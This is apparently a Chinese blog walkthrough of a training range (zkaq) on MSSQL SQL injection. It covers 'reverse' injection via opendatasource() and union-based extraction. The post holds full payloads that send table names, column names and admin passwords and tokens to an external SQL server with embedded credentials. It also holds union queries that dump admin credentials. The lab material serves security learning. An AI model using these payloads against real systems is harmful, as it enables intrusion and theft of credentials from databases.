18、注入篇--反弹注入(MSSQL)

最新推荐文章于 2024-08-24 14:49:55 发布
最新推荐文章于 2024-08-24 14:49:55 发布
阅读量780 收藏 4
点赞数 2
分类专栏: WEB安全 文章标签: SQL注入 反弹注入 MSSQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42248871/article/details/115580936
版权

MSSQL

MSSQL基础

MSSQL是指微软的SQLServer的数据库服务器

  • 每个库都会自带有sysobjects表,其中有三个字段
    1. name 当前数据库下的所有表名
    2. id 相当于表名的标识
    3. xtype 字段 中 U 代表用户创建的表名,S代表系统创建的
  • 每个库都会自带有syscolumns表,其中有两个字段
    1. name 每个表的字段名
    2. id 对应sysobjects表中id字段

反弹注入

原理

原理:将目标站点中查询到的数据结果 传到攻击者的数据库中
注入条件:网络通畅,攻击者需要有公网ip地址的数据库
所用函数:opendatasource()
将当前数据库查询的结果发送到另外一数据库服务器中
语法:opendatasource(provider_name,int_string)

公式
insert into opendatasource(‘sqloledb’,’server=服务器地址,1433;
uid=用户名;pwd=密码;database=数据库名’).数据库名.dbo.表 SQL语句

条件

​ 网络通常,攻击者需要有公网IP的数据库服务器地址

函数

​ opendatasource()

​ 作用:将目标站点查询到的数据结果 传到攻击者的数据库中

​ 用法:

​ opendatasource(‘sqloledb’,‘server=服务器地址,端口号;uid=用户名;pwd=密码;database=数据库名’)

反弹注入 步骤

  • 需创建用于存放目标站点表名的表,字段有id,name
  • 构造payload 存放 SQL语句查询到的id和name
    ';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;pwd=123456789;database=DB_14DBE69_zkaq').DB_14DBE69_zkaq.dbo.tb select id,name from sysobjects where xtype='U' -- q
  • 创建用于存放目标站点表名的字段名的表,字段有id,name
  • 构造payload
    存放指定表中的字段名
    ';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;pwd=123456789;database=DB_14DBE69_zkaq').DB_14DBE69_zkaq.dbo.col select id,name from syscolumns where id=1977058079 -- q
  • 根据查到的表名字段名 创建表和字段名
  • 构造payload得到结果
    ';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;pwd=123456789;database=DB_14DBE69_zkaq').DB_14DBE69_zkaq.dbo.res select id,username,passwd,token from admin -- q

靶场(反弹注入)

1、创建数据表tb,将查询到的id,name存放在该表中
在这里插入图片描述

2、构造payload, 查询表名

‘;insert into opendatasource(‘sqloledb’,’server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;
pwd=123456789;database=DB_14DBE69_zkaq’).DB_14DBE69_zkaq.dbo.tb select id,name from sysobjects
 where xtype=’U’ — q

返回正常
在这里插入图片描述

3、查看 tb表 是否有数据
在这里插入图片描述

4、创建存放admin表中字段的表 col
在这里插入图片描述

5、构造payload,查admin表的字段

‘;insert into opendatasource(‘sqloledb’,’server=SQL5095.site4now.net,1433;uid=DB_14DBE69_zkaq_admin;
pwd=123456789;database=DB_14DBE69_zkaq’).DB_14DBE69_zkaq.dbo.col select id,name from syscolumns
 where id=1977058079 — q

页面返回正常
在这里插入图片描述

6、查看数据库中col表
在这里插入图片描述

7、得到admin表中字段:id、username、passwd、token
创建res表 用于存放admin表中字段信息
在这里插入图片描述

8、页面返回正常

在这里插入图片描述

9、查看res表,得到flag
在这里插入图片描述

使用显错注入

显错注入基础

  • union 联合查询 去重
  • union all 不去重 显示全部数据
  • 除了MySQL数据库其他数据库查询内容要写全(select 字段 from 表名)
  • MySQL在联合查询时对字段数有严格的规定,但是对字段类型规定比较淡

显错注入步骤

  • 使用sysobjects表中name、id、xtype探测出用户创建了哪些表

    ’ union all select id,name,null from sysobjects where xtype=‘U’

  • 使用syscolumns表探测指定表id的字段名

    ’ union all select id,name,‘b’ from syscolumns where id=表的id

  • 使用selece 直接爆出数据

    select 字段名 from 表名

靶场

1、进入靶场
在这里插入图片描述

2、1后加\进行探测
在这里插入图片描述

3、构造闭合 ‘ — q
在这里插入图片描述

4、使用order by 探测字段数
order by 4 报错
在这里插入图片描述

order by 3 正常
在这里插入图片描述

字段数为3

5、使用联合查询
在这里插入图片描述

加union all 试一试
在这里插入图片描述

6、猜测表名news
在这里插入图片描述

7、会不会是 数据类型不对呢,1,2,3全部改为null
在这里插入图片描述

8、猜测第一个null是int型,第二ge和第三个是字符型
在这里插入图片描述

9、通过sysobjects表的id、xtype和name 探测用户创建的表名
payload:
‘ union all select id,name,’b’ from sysobjects where xtype=’U’— q
在这里插入图片描述

10、探测admin表中的字段,通过syscolumns表中的id和name
payload:
‘ union all select id,name,’b’ from syscolumns where id=1977058079 — q
在这里插入图片描述

11、查看passwd和token字段数据
payload:
‘ union all select id,passwd,token from admin — q
在这里插入图片描述

12、得到flag,通过

公众号小白学安全
关注
专栏目录
MSSQL-反弹注入
weixin_45634365的博客
03-04 392
一、MSSQL反弹注入的使用场景 MSSQL其实就是SQLServer。 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,造就了新颖独特的攻击思路。 在注入攻击中常常遇到这些问题: (1)明明是SQL注入点却无法注入 (2)注入工具猜解的速度异常缓慢 (3)错误提示信息关闭 (4)无法返回注入结果 为了解决上述问题,比较好的方法是使用反弹注入技术。 反弹注入:将查询到的数据插入到其他数据库,可以复制大量的数据。 二、快速搭建一个MSSQL环境 MSSQ
mssql反弹注入
笔墨稠思
11-25 425
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
MSSQL 手工注入(第一关)
最新发布
baishiqi12的博客
08-24 1429
mssql 注入,仅供参考
MSSQL注入——反弹注入
m0_55854679的博客
02-18 942
文章目录MSSQLSQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQLSQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
MSSQL注入反弹注入
MSB_WLAQ的博客
10-06 478
MSSQL反弹注入原理 依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景 用香港云快速搭建一个MSSQL环境 可以用临时邮箱注册免费的试用60天。 免费60天的试用,过期了就换个邮箱。 1.猜数据时为什么不能用数字 根据了MSSQL的特性,虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗 有 为master.dbo.sysdatabase 3.反弹注入满足的条件 能否堆叠查询,...
MSSQL--反弹注入
qq_68233961的博客
08-15 264
MSSQL--反弹注入
[zkaq靶场]SQL注入--MSSQL反弹注入
wwxxee
05-08 463
MSSQL反弹注入 使用场景 明明是SQL注入点,但是使用工具注入缓慢,或者错误提示信息关闭,无法返回注入结果等。较好的解决办法就是使用反弹注入。 核心 反弹注入的核心就是opendatasouce()函数。 将查询的数据结果插入到我们自己的数据库中。 opendatasource 为了方便理解,可以看理解为 ‘使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。 语法: OPENDATASOURCE(provider_name,init_string) provider_n
封神台MSSQL注入 - 反弹注入
qq_40941912的博客
10-05 275
一、作业 MSSQL注入 - 反弹注入 (Rank: 5) 判断页面是否存在注入:’ and 1=2 – qwe.页面不正常 判断输出位个数:‘ order by 3 — qwe,3个输出位. 输出位输出: 错误原因:MSSQL对输出位数据很严格.应该: ‘ union select 5,null,null — qwe 正常,说明第一个输出字段为整数. ‘union select 5,’a’,’a’ — qwe 说明第2,3字段为字符串. 对MMSQL猜表名: MMSQL的自带数据
getshell之sql注入os-shell
MoCoCN的博客
12-10 2048
@MoCo菜弟弟记录一次从普通用户弱口令到sql注入拿shell 0x00 前言 这段时间一直在挖edu,挖到一个从普通用户权限到getshell的站,觉得挺有意义的,记录了一下,也学到了挺多知识的,但中间出现了写小插曲,有个地方没搞好,没弄明白,就一直没发文章,最近通过某不知名大佬的帮助下已经弄懂了,所以前来发个文章。 这几天公司没什么活,主要是公司CNVD和CNNVD的资质,就是无限的刷洞,上周末领导发了句这个,我感觉是对我们这个交洞数量有点不满。 该说不说,该做不做的,领导既然都说那了必须得安排啊
数据库注入学习笔记3---MSSQ注入(反弹注入)
qq_41759633的博客
08-07 582
引:MSSQL注射攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路,而反弹注入技术需要依靠opendatasource函数支持 opendatasource:‘使用opendatasource函数将当前数据库中查询的结果发送到另一数据库服务器中’ 攻击过程: 攻击前准备: 首先需要在攻击者主机的SQL server 2000...
网络安全从入门到精通(第六章-4)MSsql注入 —— 反弹注入
划水的小白白
02-05 2062
本文内容: ~MSSQL反弹注入使用场景 ~快速搭建一个MSSQL环境(骚姿势) ~MSSQL反弹注入语句解析 ~MSSQL实战注意
MSSQL-反弹注入(zkaq靶场)
v2ish1yan的博客
04-29 3456
MSSQL就是sql server 他跟mysql进行注入的方式有所不同 这里写两种方法 1.联合查询注入 首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类型一样,但是可以使用null来填充 首先来猜字段 order by 3时正确,order by 4时错误 所以字段数为3 然后进行猜数据类型。先 ?id=1’ union all select NULL,NULL,NULL – qwe 回显正常 挨个测试数据类型 ?id=1’ union all sele
MSSQL注入反弹注入
qq_58000413的博客
09-21 739
database=hacker数据库名 ').数据库名.dbo.表名 select *(被攻击网站的字段,通过order by已经判断出来了) from admin。database=数据库名 ').数据库名.dbo.字段 (字段可以多个,逗号隔开)反弹注入原理,将目标的数据全部反弹到自己构造的数据库中,opendatasource就是连接自己数据库用的(select * from syscolumns where id='前面查到的id值'
mysql反弹注入平台_MSSQL注入--反弹注入
weixin_30284287的博客
02-11 242
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...
五、注入(4)MSsql注入——反弹注入
weixin_45540609的博客
04-21 234
MSSQL反弹注入 当明明是注入点却无法进行注入注入工具猜解速度缓慢,错误提示信息关闭,无法返回注入结果等。这时比较好的方法就是使用反弹注入,需要依靠opendatasource函数支持。 反弹注入:目标站点把查询数据的结果插入到黑客的数据库里 条件: 1、网络通畅(需要公网ip) 2、自己的MSSQL数据库 可以申请一个免费的虚拟空间,虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境且不需要特意购置云服务器来获取一个公网IP。 香港云 http://www.webweb..
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 535
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
MS SQL数据库——反弹注入
m0_46304840的博客
03-12 321
前言 正文 0x01 查表 0x02 查字段 0x03 查数据 0x04 总结 文末 前言 ms sql还有一些盲注啥的,就不去深入的去搞了,就再写一反弹注入 然而这边我们可以去搞个虚拟空间:香港云 涉及到的一个函数opendatasource() 可以看成open,data,source三个单词 语法:opendatasource(provider_name,ini...
Mssql注入——dns注入反弹注入
weixin_46601374的博客
02-28 2896
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
web安全入门(第五章-4)反弹注入
Yzz_的博客
06-02 566
一、MSSQL反弹注入使用场景 0,MSSQL数据库就是Sql server数据库 1,前言 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大, 存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路 2,遇到问题 明明有注入点却无法进行注入,工具攻击速度也是异常缓慢,错误提示信息关闭, 无法返回注入结果,这些都是在注入攻击中常常遇到的问题。为例解决以上的疑难杂症, 我们来学习反弹注入反弹注入则依靠opendatasource函数支持 3,简
MSSQL注入漏洞与防御解析
在"Mssql高手注入.txt"文档中,主要探讨了SQL注入攻击的相关技术,特别是在Microsoft SQL Server数据库环境中的高级技巧。文本详细介绍了几种不同的SQL注入实例,旨在展示黑客如何利用这些漏洞来获取敏感数据或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值